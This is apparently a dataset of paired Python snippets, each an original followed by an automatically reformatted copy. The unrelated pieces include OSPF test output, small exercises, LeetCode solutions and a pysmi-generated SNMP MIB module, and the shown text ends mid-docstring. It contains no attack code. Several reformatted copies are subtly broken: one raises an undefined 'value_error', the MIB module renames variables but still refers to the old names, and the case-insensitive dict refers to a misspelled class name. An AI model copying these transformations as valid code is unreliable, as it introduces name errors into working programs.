'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.205.1',
'age': 457,
'checksum': '0x4765',
'fragment_number': 271,
'length': 116,
'lsa_id': '10.1.1.15',
'num_links': 1,
'opaque_id': 271,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}}}}}}}}},
'2': {}}}}}}}
| expected_output = {'vrf': {'default': {'address_family': {'ipv4': {'instance': {'1': {'areas': {'0.0.0.0': {'database': {'lsa_types': {10: {'lsa_type': 10, 'lsas': {'10.1.0.0 192.168.4.1': {'adv_router': '192.168.4.1', 'lsa_id': '10.1.0.0', 'ospfv2': {'body': {'opaque': {}}, 'header': {'adv_router': '192.168.4.1', 'age': 720, 'checksum': '0x8c2b', 'fragment_number': 0, 'length': 28, 'lsa_id': '10.1.0.0', 'mpls_te_router_id': '192.168.4.1', 'num_links': 0, 'opaque_id': 0, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.0 192.168.154.1': {'adv_router': '192.168.154.1', 'lsa_id': '10.1.0.0', 'ospfv2': {'body': {'opaque': {}}, 'header': {'adv_router': '192.168.154.1', 'age': 720, 'checksum': '0x8e27', 'fragment_number': 0, 'length': 28, 'lsa_id': '10.1.0.0', 'mpls_te_router_id': '192.168.154.1', 'num_links': 0, 'opaque_id': 0, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.0 192.168.51.1': {'adv_router': '192.168.51.1', 'lsa_id': '10.1.0.0', 'ospfv2': {'body': {'opaque': {}}, 'header': {'adv_router': '192.168.51.1', 'age': 515, 'checksum': '0x9023', 'fragment_number': 0, 'length': 28, 'lsa_id': '10.1.0.0', 'mpls_te_router_id': '192.168.51.1', 'num_links': 0, 'opaque_id': 0, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.0 192.168.205.1': {'adv_router': '192.168.205.1', 'lsa_id': '10.1.0.0', 'ospfv2': {'body': {'opaque': {}}, 'header': {'adv_router': '192.168.205.1', 'age': 497, 'checksum': '0x921f', 'fragment_number': 0, 'length': 28, 'lsa_id': '10.1.0.0', 'mpls_te_router_id': '192.168.205.1', 'num_links': 0, 'opaque_id': 0, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.233 192.168.51.1': {'adv_router': '192.168.51.1', 'lsa_id': '10.1.0.233', 'ospfv2': {'body': {'opaque': {'link_tlvs': {1: {'admin_group': '0x0', 'link_id': '192.168.145.2', 'link_name': 'broadcast network', 'link_type': 2, 'local_if_ipv4_addrs': {'192.168.145.2': {}}, 'max_bandwidth': 5000000000, 'max_reservable_bandwidth': 3749999872, 'remote_if_ipv4_addrs': {'0.0.0.0': {}}, 'te_metric': 1, 'unreserved_bandwidths': {'0 3749999872': {'priority': 0, 'unreserved_bandwidth': 3749999872}, '1 3749999872': {'priority': 1, 'unreserved_bandwidth': 3749999872}, '2 3749999872': {'priority': 2, 'unreserved_bandwidth': 3749999872}, '3 3749999872': {'priority': 3, 'unreserved_bandwidth': 3749999872}, '4 3749999872': {'priority': 4, 'unreserved_bandwidth': 3749999872}, '5 3749999872': {'priority': 5, 'unreserved_bandwidth': 3749999872}, '6 3749999872': {'priority': 6, 'unreserved_bandwidth': 3749999872}, '7 3749999872': {'priority': 7, 'unreserved_bandwidth': 3749999872}}}}}}, 'header': {'adv_router': '192.168.51.1', 'age': 475, 'checksum': '0x9a3b', 'fragment_number': 233, 'length': 116, 'lsa_id': '10.1.0.233', 'num_links': 1, 'opaque_id': 233, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.237 192.168.51.1': {'adv_router': '192.168.51.1', 'lsa_id': '10.1.0.237', 'ospfv2': {'body': {'opaque': {'link_tlvs': {1: {'admin_group': '0x0', 'link_id': '192.168.81.2', 'link_name': 'broadcast network', 'link_type': 2, 'local_if_ipv4_addrs': {'192.168.81.1': {}}, 'max_bandwidth': 5000000000, 'max_reservable_bandwidth': 3749999872, 'remote_if_ipv4_addrs': {'0.0.0.0': {}}, 'te_metric': 1, 'unreserved_bandwidths': {'0 3749999872': {'priority': 0, 'unreserved_bandwidth': 3749999872}, '1 3749999872': {'priority': 1, 'unreserved_bandwidth': 3749999872}, '2 3749999872': {'priority': 2, 'unreserved_bandwidth': 3749999872}, '3 3749999872': {'priority': 3, 'unreserved_bandwidth': 3749999872}, '4 3749999872': {'priority': 4, 'unreserved_bandwidth': 3749999872}, '5 3749999872': {'priority': 5, 'unreserved_bandwidth': 3749999872}, '6 3749999872': {'priority': 6, 'unreserved_bandwidth': 3749999872}, '7 3749999872': {'priority': 7, 'unreserved_bandwidth': 3749999872}}}}}}, 'header': {'adv_router': '192.168.51.1', 'age': 455, 'checksum': '0x7c40', 'fragment_number': 237, 'length': 116, 'lsa_id': '10.1.0.237', 'num_links': 1, 'opaque_id': 237, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.42 192.168.154.1': {'adv_router': '192.168.154.1', 'lsa_id': '10.1.0.42', 'ospfv2': {'body': {'opaque': {'link_tlvs': {1: {'admin_group': '0x0', 'link_id': '192.168.196.2', 'link_name': 'broadcast network', 'link_type': 2, 'local_if_ipv4_addrs': {'192.168.196.2': {}}, 'max_bandwidth': 2500000000, 'max_reservable_bandwidth': 1874999936, 'remote_if_ipv4_addrs': {'0.0.0.0': {}}, 'te_metric': 2, 'unreserved_bandwidths': {'0 1874999936': {'priority': 0, 'unreserved_bandwidth': 1874999936}, '1 1874999936': {'priority': 1, 'unreserved_bandwidth': 1874999936}, '2 1874999936': {'priority': 2, 'unreserved_bandwidth': 1874999936}, '3 1874999936': {'priority': 3, 'unreserved_bandwidth': 1874999936}, '4 1874999936': {'priority': 4, 'unreserved_bandwidth': 1874999936}, '5 1874999936': {'priority': 5, 'unreserved_bandwidth': 1874999936}, '6 1874999936': {'priority': 6, 'unreserved_bandwidth': 1874999936}, '7 1874999936': {'priority': 7, 'unreserved_bandwidth': 1874999936}}}}}}, 'header': {'adv_router': '192.168.154.1', 'age': 510, 'checksum': '0xcce3', 'fragment_number': 42, 'length': 116, 'lsa_id': '10.1.0.42', 'num_links': 1, 'opaque_id': 42, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.47 192.168.154.1': {'adv_router': '192.168.154.1', 'lsa_id': '10.1.0.47', 'ospfv2': {'body': {'opaque': {'link_tlvs': {1: {'admin_group': '0x0', 'link_id': '192.168.145.2', 'link_name': 'broadcast network', 'link_type': 2, 'local_if_ipv4_addrs': {'192.168.145.1': {}}, 'max_bandwidth': 5000000000, 'max_reservable_bandwidth': 3749999872, 'remote_if_ipv4_addrs': {'0.0.0.0': {}}, 'te_metric': 1, 'unreserved_bandwidths': {'0 3749999872': {'priority': 0, 'unreserved_bandwidth': 3749999872}, '1 3749999872': {'priority': 1, 'unreserved_bandwidth': 3749999872}, '2 3749999872': {'priority': 2, 'unreserved_bandwidth': 3749999872}, '3 3749999872': {'priority': 3, 'unreserved_bandwidth': 3749999872}, '4 3749999872': {'priority': 4, 'unreserved_bandwidth': 3749999872}, '5 3749999872': {'priority': 5, 'unreserved_bandwidth': 3749999872}, '6 3749999872': {'priority': 6, 'unreserved_bandwidth': 3749999872}, '7 3749999872': {'priority': 7, 'unreserved_bandwidth': 3749999872}}}}}}, 'header': {'adv_router': '192.168.154.1', 'age': 470, 'checksum': '0xcec3', 'fragment_number': 47, 'length': 116, 'lsa_id': '10.1.0.47', 'num_links': 1, 'opaque_id': 47, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.51 192.168.154.1': {'adv_router': '192.168.154.1', 'lsa_id': '10.1.0.51', 'ospfv2': {'body': {'opaque': {'link_tlvs': {1: {'admin_group': '0x0', 'link_id': '192.168.106.2', 'link_name': 'broadcast network', 'link_type': 2, 'local_if_ipv4_addrs': {'192.168.106.1': {}}, 'max_bandwidth': 5000000000, 'max_reservable_bandwidth': 3749999872, 'remote_if_ipv4_addrs': {'0.0.0.0': {}}, 'te_metric': 1, 'unreserved_bandwidths': {'0 3749999872': {'priority': 0, 'unreserved_bandwidth': 3749999872}, '1 3749999872': {'priority': 1, 'unreserved_bandwidth': 3749999872}, '2 3749999872': {'priority': 2, 'unreserved_bandwidth': 3749999872}, '3 3749999872': {'priority': 3, 'unreserved_bandwidth': 3749999872}, '4 3749999872': {'priority': 4, 'unreserved_bandwidth': 3749999872}, '5 3749999872': {'priority': 5, 'unreserved_bandwidth': 3749999872}, '6 3749999872': {'priority': 6, 'unreserved_bandwidth': 3749999872}, '7 3749999872': {'priority': 7, 'unreserved_bandwidth': 3749999872}}}}}}, 'header': {'adv_router': '192.168.154.1', 'age': 450, 'checksum': '0xd8b3', 'fragment_number': 51, 'length': 116, 'lsa_id': '10.1.0.51', 'num_links': 1, 'opaque_id': 51, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.0.55 192.168.4.1': {'adv_router': '192.168.4.1', 'lsa_id': '10.1.0.55', 'ospfv2': {'body': {'opaque': {'link_tlvs': {1: {'admin_group': '0x0', 'link_id': '192.168.196.2', 'link_name': 'broadcast network', 'link_type': 2, 'local_if_ipv4_addrs': {'192.168.196.1': {}}, 'max_bandwidth': 2500000000, 'max_reservable_bandwidth': 1874999936, 'remote_if_ipv4_addrs': {'0.0.0.0': {}}, 'te_metric': 2, 'unreserved_bandwidths': {'0 1874999936': {'priority': 0, 'unreserved_bandwidth': 1874999936}, '1 1874999936': {'priority': 1, 'unreserved_bandwidth': 1874999936}, '2 1874999936': {'priority': 2, 'unreserved_bandwidth': 1874999936}, '3 1874999936': {'priority': 3, 'unreserved_bandwidth': 1874999936}, '4 1874999936': {'priority': 4, 'unreserved_bandwidth': 1874999936}, '5 1874999936': {'priority': 5, 'unreserved_bandwidth': 1874999936}, '6 1874999936': {'priority': 6, 'unreserved_bandwidth': 1874999936}, '7 1874999936': {'priority': 7, 'unreserved_bandwidth': 1874999936}}}}}}, 'header': {'adv_router': '192.168.4.1', 'age': 510, 'checksum': '0x3372', 'fragment_number': 55, 'length': 116, 'lsa_id': '10.1.0.55', 'num_links': 1, 'opaque_id': 55, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.1.11 192.168.205.1': {'adv_router': '192.168.205.1', 'lsa_id': '10.1.1.11', 'ospfv2': {'body': {'opaque': {'link_tlvs': {1: {'admin_group': '0x0', 'link_id': '192.168.81.2', 'link_name': 'broadcast network', 'link_type': 2, 'local_if_ipv4_addrs': {'192.168.81.2': {}}, 'max_bandwidth': 5000000000, 'max_reservable_bandwidth': 3749999872, 'remote_if_ipv4_addrs': {'0.0.0.0': {}}, 'te_metric': 1, 'unreserved_bandwidths': {'0 3749999872': {'priority': 0, 'unreserved_bandwidth': 3749999872}, '1 3749999872': {'priority': 1, 'unreserved_bandwidth': 3749999872}, '2 3749999872': {'priority': 2, 'unreserved_bandwidth': 3749999872}, '3 3749999872': {'priority': 3, 'unreserved_bandwidth': 3749999872}, '4 3749999872': {'priority': 4, 'unreserved_bandwidth': 3749999872}, '5 3749999872': {'priority': 5, 'unreserved_bandwidth': 3749999872}, '6 3749999872': {'priority': 6, 'unreserved_bandwidth': 3749999872}, '7 3749999872': {'priority': 7, 'unreserved_bandwidth': 3749999872}}}}}}, 'header': {'adv_router': '192.168.205.1', 'age': 447, 'checksum': '0x6537', 'fragment_number': 267, 'length': 116, 'lsa_id': '10.1.1.11', 'num_links': 1, 'opaque_id': 267, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}, '10.1.1.15 192.168.205.1': {'adv_router': '192.168.205.1', 'lsa_id': '10.1.1.15', 'ospfv2': {'body': {'opaque': {'link_tlvs': {1: {'admin_group': '0x0', 'link_id': '192.168.106.2', 'link_name': 'broadcast network', 'link_type': 2, 'local_if_ipv4_addrs': {'192.168.106.2': {}}, 'max_bandwidth': 5000000000, 'max_reservable_bandwidth': 3749999872, 'remote_if_ipv4_addrs': {'0.0.0.0': {}}, 'te_metric': 1, 'unreserved_bandwidths': {'0 3749999872': {'priority': 0, 'unreserved_bandwidth': 3749999872}, '1 3749999872': {'priority': 1, 'unreserved_bandwidth': 3749999872}, '2 3749999872': {'priority': 2, 'unreserved_bandwidth': 3749999872}, '3 3749999872': {'priority': 3, 'unreserved_bandwidth': 3749999872}, '4 3749999872': {'priority': 4, 'unreserved_bandwidth': 3749999872}, '5 3749999872': {'priority': 5, 'unreserved_bandwidth': 3749999872}, '6 3749999872': {'priority': 6, 'unreserved_bandwidth': 3749999872}, '7 3749999872': {'priority': 7, 'unreserved_bandwidth': 3749999872}}}}}}, 'header': {'adv_router': '192.168.205.1', 'age': 457, 'checksum': '0x4765', 'fragment_number': 271, 'length': 116, 'lsa_id': '10.1.1.15', 'num_links': 1, 'opaque_id': 271, 'opaque_type': 1, 'option': '0x2', 'option_desc': 'No TOS-capability, No DC', 'seq_num': '0x80000002', 'type': 10}}}}}}}}}}, '2': {}}}}}}} |
# Right justify a string to column 70 of the screen
def rightjustify(sig):
full_line = ""
num_chars = len(sig)
blank = 70 - num_chars
full_line += " "*blank + sig
pass
print(full_line)
rightjustify("monty")
| def rightjustify(sig):
full_line = ''
num_chars = len(sig)
blank = 70 - num_chars
full_line += ' ' * blank + sig
pass
print(full_line)
rightjustify('monty') |
def decimal_to_binary(n):
if n > 1: decimal_to_binary(n//2)
print(n % 2, end = '')
try: decimal_to_binary(int(input("Enter an Integer to Covert into Binary: ")))
except ValueError: print("Input is not an integer.")
print()
| def decimal_to_binary(n):
if n > 1:
decimal_to_binary(n // 2)
print(n % 2, end='')
try:
decimal_to_binary(int(input('Enter an Integer to Covert into Binary: ')))
except ValueError:
print('Input is not an integer.')
print() |
'''
Given a 2D array A, each cell is 0 (representing sea) or 1 (representing land)
A move consists of walking from one land square 4-directionally to another land square, or off the boundary of the grid.
Return the number of land squares in the grid for which we cannot walk off the boundary of the grid in any number of moves.
Example 1:
Input: [[0,0,0,0],[1,0,1,0],[0,1,1,0],[0,0,0,0]]
Output: 3
Explanation:
There are three 1s that are enclosed by 0s, and one 1 that isn't enclosed because its on the boundary.
Example 2:
Input: [[0,1,1,0],[0,0,1,0],[0,0,1,0],[0,0,0,0]]
Output: 0
Explanation:
All 1s are either on the boundary or can reach the boundary.
Note:
1 <= A.length <= 500
1 <= A[i].length <= 500
0 <= A[i][j] <= 1
All rows have the same size.
'''
class Solution(object):
def numEnclaves(self, A):
"""
:type A: List[List[int]]
:rtype: int
"""
result = 0
queue = []
for row in range(len(A)):
for col in range(len(A[0])):
result += A[row][col]
if (row*col == 0 or row == len(A)-1 or col == len(A[0])-1) and A[row][col] == 1:
queue.append((row, col))
x_move = [-1, 0, 1, 0]
y_move = [0, 1, 0, -1]
while queue:
x, y = queue.pop(0)
A[x][y] = 0
result -= 1
for xm, ym in zip(x_move, y_move):
nx = x + xm
ny = y + ym
if 0<= nx <len(A) and 0 <= ny < len(A[0]) and A[nx][ny] == 1 and (nx, ny) not in queue:
queue.append((nx, ny))
return result
| """
Given a 2D array A, each cell is 0 (representing sea) or 1 (representing land)
A move consists of walking from one land square 4-directionally to another land square, or off the boundary of the grid.
Return the number of land squares in the grid for which we cannot walk off the boundary of the grid in any number of moves.
Example 1:
Input: [[0,0,0,0],[1,0,1,0],[0,1,1,0],[0,0,0,0]]
Output: 3
Explanation:
There are three 1s that are enclosed by 0s, and one 1 that isn't enclosed because its on the boundary.
Example 2:
Input: [[0,1,1,0],[0,0,1,0],[0,0,1,0],[0,0,0,0]]
Output: 0
Explanation:
All 1s are either on the boundary or can reach the boundary.
Note:
1 <= A.length <= 500
1 <= A[i].length <= 500
0 <= A[i][j] <= 1
All rows have the same size.
"""
class Solution(object):
def num_enclaves(self, A):
"""
:type A: List[List[int]]
:rtype: int
"""
result = 0
queue = []
for row in range(len(A)):
for col in range(len(A[0])):
result += A[row][col]
if (row * col == 0 or row == len(A) - 1 or col == len(A[0]) - 1) and A[row][col] == 1:
queue.append((row, col))
x_move = [-1, 0, 1, 0]
y_move = [0, 1, 0, -1]
while queue:
(x, y) = queue.pop(0)
A[x][y] = 0
result -= 1
for (xm, ym) in zip(x_move, y_move):
nx = x + xm
ny = y + ym
if 0 <= nx < len(A) and 0 <= ny < len(A[0]) and (A[nx][ny] == 1) and ((nx, ny) not in queue):
queue.append((nx, ny))
return result |
#!/usr/bin/env python3
"""This file contains the health check functions used on a service bundle.
"""
| """This file contains the health check functions used on a service bundle.
""" |
n = input()
my_set = set()
for item in input().split():
my_set.add(item)
m = input()
for item in input().split():
if item in my_set:
print(1)
else:
print(0) | n = input()
my_set = set()
for item in input().split():
my_set.add(item)
m = input()
for item in input().split():
if item in my_set:
print(1)
else:
print(0) |
class Observable:
def __init__(self):
self._observers = []
def register(self, observer):
if observer not in self._observers:
self._observers.append(observer)
def unregister(self, observer):
if observer in self._observers:
self._observers.remove(observer)
def unregister_all(self):
if self._observers:
del self._observers[:]
def update_observers(self, *args, **kwargs):
for observer in self._observers: # type: Observer
observer.observe(*args, **kwargs)
class Observer:
def __init__(self, observables=None):
if observables is not None:
if isinstance(observables, Observable):
observables.register(self)
elif isinstance(observables, list):
for observable in observables:
observable.register(self)
else:
raise ValueError(f"Incorrect values passed to Observer argument observables ({type(observables)}).")
def observe(self, *args, **kwargs):
raise NotImplementedError
| class Observable:
def __init__(self):
self._observers = []
def register(self, observer):
if observer not in self._observers:
self._observers.append(observer)
def unregister(self, observer):
if observer in self._observers:
self._observers.remove(observer)
def unregister_all(self):
if self._observers:
del self._observers[:]
def update_observers(self, *args, **kwargs):
for observer in self._observers:
observer.observe(*args, **kwargs)
class Observer:
def __init__(self, observables=None):
if observables is not None:
if isinstance(observables, Observable):
observables.register(self)
elif isinstance(observables, list):
for observable in observables:
observable.register(self)
else:
raise value_error(f'Incorrect values passed to Observer argument observables ({type(observables)}).')
def observe(self, *args, **kwargs):
raise NotImplementedError |
class Solution:
def lengthOfLongestSubstring(self, s):
dicts = {}
maxlength = start = 0
for i,value in enumerate(s):
if value in dicts:
sums = dicts[value] + 1
if sums > start:
start = sums
num = i - start + 1
if num > maxlength:
maxlength = num
dicts[value] = i
return maxlength
| class Solution:
def length_of_longest_substring(self, s):
dicts = {}
maxlength = start = 0
for (i, value) in enumerate(s):
if value in dicts:
sums = dicts[value] + 1
if sums > start:
start = sums
num = i - start + 1
if num > maxlength:
maxlength = num
dicts[value] = i
return maxlength |
# -*- coding: utf-8
# http://stackoverflow.com/questions/2082152/case-insensitive-dictionary
class CaseInsensitiveDict(dict):
def __setitem__(self, key, value):
super(Caseinsensitivedict, self).__setitem__(key.lower(), value)
def __getitem__(self, key):
return super(Caseinsensitivedict, self).__getitem__(key.lower())
| class Caseinsensitivedict(dict):
def __setitem__(self, key, value):
super(Caseinsensitivedict, self).__setitem__(key.lower(), value)
def __getitem__(self, key):
return super(Caseinsensitivedict, self).__getitem__(key.lower()) |
student_name = input()
count = 0
count_fail = 0
grades = []
grade = float(input())
while count < 12:
if grade < 4:
count_fail += 1
if count_fail > 1:
print(f"{student_name} has been excluded at {count} grade")
exit()
grades.append(grade)
else:
grades.append(grade)
count += 1
if count < 12:
grade = float(input())
avarage_grade = sum(grades) / len(grades)
print(f"{student_name} graduated. Average grade: {avarage_grade:.2f}") | student_name = input()
count = 0
count_fail = 0
grades = []
grade = float(input())
while count < 12:
if grade < 4:
count_fail += 1
if count_fail > 1:
print(f'{student_name} has been excluded at {count} grade')
exit()
grades.append(grade)
else:
grades.append(grade)
count += 1
if count < 12:
grade = float(input())
avarage_grade = sum(grades) / len(grades)
print(f'{student_name} graduated. Average grade: {avarage_grade:.2f}') |
#
# PySNMP MIB module PDN-MPE-HEALTH-AND-STATUS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/PDN-MPE-HEALTH-AND-STATUS-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:39:22 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint")
entPhysicalIndex, = mibBuilder.importSymbols("ENTITY-MIB", "entPhysicalIndex")
mpe_devHealth, = mibBuilder.importSymbols("PDN-HEADER-MIB", "mpe-devHealth")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, Bits, NotificationType, MibIdentifier, NotificationType, Integer32, ObjectIdentity, Counter64, iso, IpAddress, ModuleIdentity, Counter32, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "Bits", "NotificationType", "MibIdentifier", "NotificationType", "Integer32", "ObjectIdentity", "Counter64", "iso", "IpAddress", "ModuleIdentity", "Counter32", "Unsigned32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
mpeDevHealthAndStatusMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 1))
mpeDevHealthAndStatusMIBTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 2))
mpeDevHealthAndStatusTable = MibTable((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 1, 1), )
if mibBuilder.loadTexts: mpeDevHealthAndStatusTable.setStatus('mandatory')
if mibBuilder.loadTexts: mpeDevHealthAndStatusTable.setDescription("A table that contains information about an Entity's health.")
mpeDevHealthAndStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 1, 1, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: mpeDevHealthAndStatusEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mpeDevHealthAndStatusEntry.setDescription("A list of information for an entity's health.")
mpeDevSelfTestResults = MibTableColumn((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 1, 1, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mpeDevSelfTestResults.setStatus('mandatory')
if mibBuilder.loadTexts: mpeDevSelfTestResults.setDescription('Self-test results. Self-test (or power-up test) results summarizes the test results of each CCA, where each CCA test result is separated by a semi-colon. Refer to device-specific user documentation for a complete description of the self test codes and messages.')
mpeSelfTestFailure = NotificationType((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 2) + (0,1)).setObjects(("PDN-MPE-HEALTH-AND-STATUS-MIB", "mpeDevSelfTestResults"))
if mibBuilder.loadTexts: mpeSelfTestFailure.setDescription("This trap signifies that the sending protocol's device has failed self test. The variable binding for this trap would be the selfTest devSelfTestResults object of the Health and Status MIB. The exact format of this display string will be well-documented in the Operational Specifications of the device.")
mibBuilder.exportSymbols("PDN-MPE-HEALTH-AND-STATUS-MIB", mpeDevHealthAndStatusEntry=mpeDevHealthAndStatusEntry, mpeDevHealthAndStatusTable=mpeDevHealthAndStatusTable, mpeDevHealthAndStatusMIBTraps=mpeDevHealthAndStatusMIBTraps, mpeDevHealthAndStatusMIBObjects=mpeDevHealthAndStatusMIBObjects, mpeDevSelfTestResults=mpeDevSelfTestResults, mpeSelfTestFailure=mpeSelfTestFailure)
| (object_identifier, integer, octet_string) = mibBuilder.importSymbols('ASN1', 'ObjectIdentifier', 'Integer', 'OctetString')
(named_values,) = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')
(value_range_constraint, constraints_union, single_value_constraint, constraints_intersection, value_size_constraint) = mibBuilder.importSymbols('ASN1-REFINEMENT', 'ValueRangeConstraint', 'ConstraintsUnion', 'SingleValueConstraint', 'ConstraintsIntersection', 'ValueSizeConstraint')
(ent_physical_index,) = mibBuilder.importSymbols('ENTITY-MIB', 'entPhysicalIndex')
(mpe_dev_health,) = mibBuilder.importSymbols('PDN-HEADER-MIB', 'mpe-devHealth')
(module_compliance, notification_group) = mibBuilder.importSymbols('SNMPv2-CONF', 'ModuleCompliance', 'NotificationGroup')
(gauge32, mib_scalar, mib_table, mib_table_row, mib_table_column, time_ticks, bits, notification_type, mib_identifier, notification_type, integer32, object_identity, counter64, iso, ip_address, module_identity, counter32, unsigned32) = mibBuilder.importSymbols('SNMPv2-SMI', 'Gauge32', 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn', 'TimeTicks', 'Bits', 'NotificationType', 'MibIdentifier', 'NotificationType', 'Integer32', 'ObjectIdentity', 'Counter64', 'iso', 'IpAddress', 'ModuleIdentity', 'Counter32', 'Unsigned32')
(display_string, textual_convention) = mibBuilder.importSymbols('SNMPv2-TC', 'DisplayString', 'TextualConvention')
mpe_dev_health_and_status_mib_objects = mib_identifier((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 1))
mpe_dev_health_and_status_mib_traps = mib_identifier((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 2))
mpe_dev_health_and_status_table = mib_table((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 1, 1))
if mibBuilder.loadTexts:
mpeDevHealthAndStatusTable.setStatus('mandatory')
if mibBuilder.loadTexts:
mpeDevHealthAndStatusTable.setDescription("A table that contains information about an Entity's health.")
mpe_dev_health_and_status_entry = mib_table_row((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 1, 1, 1)).setIndexNames((0, 'ENTITY-MIB', 'entPhysicalIndex'))
if mibBuilder.loadTexts:
mpeDevHealthAndStatusEntry.setStatus('mandatory')
if mibBuilder.loadTexts:
mpeDevHealthAndStatusEntry.setDescription("A list of information for an entity's health.")
mpe_dev_self_test_results = mib_table_column((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 1, 1, 1, 1), display_string().subtype(subtypeSpec=value_size_constraint(0, 255))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
mpeDevSelfTestResults.setStatus('mandatory')
if mibBuilder.loadTexts:
mpeDevSelfTestResults.setDescription('Self-test results. Self-test (or power-up test) results summarizes the test results of each CCA, where each CCA test result is separated by a semi-colon. Refer to device-specific user documentation for a complete description of the self test codes and messages.')
mpe_self_test_failure = notification_type((1, 3, 6, 1, 4, 1, 1795, 2, 24, 12, 7, 2) + (0, 1)).setObjects(('PDN-MPE-HEALTH-AND-STATUS-MIB', 'mpeDevSelfTestResults'))
if mibBuilder.loadTexts:
mpeSelfTestFailure.setDescription("This trap signifies that the sending protocol's device has failed self test. The variable binding for this trap would be the selfTest devSelfTestResults object of the Health and Status MIB. The exact format of this display string will be well-documented in the Operational Specifications of the device.")
mibBuilder.exportSymbols('PDN-MPE-HEALTH-AND-STATUS-MIB', mpeDevHealthAndStatusEntry=mpeDevHealthAndStatusEntry, mpeDevHealthAndStatusTable=mpeDevHealthAndStatusTable, mpeDevHealthAndStatusMIBTraps=mpeDevHealthAndStatusMIBTraps, mpeDevHealthAndStatusMIBObjects=mpeDevHealthAndStatusMIBObjects, mpeDevSelfTestResults=mpeDevSelfTestResults, mpeSelfTestFailure=mpeSelfTestFailure) |
class Eval(object):
def __init__(self, param):
self.__str = param.get('value')
self.__length = param.get('length',100000)
self.__counter = 0
def next(self):
self.__counter += 1
if self.__counter > self.__length:
raise StopIteration
value = self.__str
return {'value': value}
def length(self):
return self.__length
| class Eval(object):
def __init__(self, param):
self.__str = param.get('value')
self.__length = param.get('length', 100000)
self.__counter = 0
def next(self):
self.__counter += 1
if self.__counter > self.__length:
raise StopIteration
value = self.__str
return {'value': value}
def length(self):
return self.__length |
n=int(input())
a=""
for i in range(1,n+1):
a+=str(i)
print(a)
| n = int(input())
a = ''
for i in range(1, n + 1):
a += str(i)
print(a) |
"""
Problem Statement:
Given a non-empty array of integers,
every element appears twice except for one.
Find that single one.
Note:
Your algorithm should have a linear runtime complexity.
Could you implement it without using extra memory?
"""
def single_number(integers):
unique = 0
for integer in integers:
unique ^= integer
# print(unique)
return unique
if __name__ == "__main__":
assert single_number([-1, 1, 2, 1, 2]) == -1
# if unique is 0, it either means 0 is the single integer
assert single_number([0, 1, 2, 1, 2]) == 0
# or there is no single int at all (and this is considered an edge case)
assert single_number([1, 2, 1, 2]) == 0
| """
Problem Statement:
